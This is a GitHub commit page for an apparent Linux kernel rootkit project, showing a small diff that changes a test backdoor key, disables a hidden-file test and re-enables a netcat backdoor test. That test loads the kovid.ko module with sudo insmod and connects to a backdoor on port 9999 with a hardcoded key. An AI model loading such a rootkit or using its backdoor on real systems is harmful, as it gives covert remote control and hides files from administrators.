Skip to content

Commit

Permalink
test: Fix nc bd test
Browse files Browse the repository at this point in the history
  • Loading branch information
djolertrk committed Nov 29, 2024
1 parent d2a6096 commit 768fbe4
Show file tree
Hide file tree
Showing 3 changed files with 3 additions and 3 deletions.
2 changes: 1 addition & 1 deletion Makefile
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ ifndef TEST_ENV
BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')
else
BDKEY=0x1
BDKEY=0x7d3b1cb572f16425
UNHIDEKEY=0x2
endif

Expand Down
1 change: 1 addition & 0 deletions test/native/hiden-file.test
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand Down
3 changes: 1 addition & 2 deletions test/native/nc-backdoor.test
Original file line number Diff line number Diff line change
@@ -1,4 +1,3 @@
# REQUIRES: 0
# REQUIRES: DEBUG_ONLY
# REQUIRES: NATIVE_TESTS

Expand All @@ -8,7 +7,7 @@
sudo dmesg -c
sleep 10
sudo insmod ../../../build/kovid.ko
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999
sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425
sudo rmmod kovid
sudo dmesg

Expand Down

0 comments on commit 768fbe4

Please sign in to comment.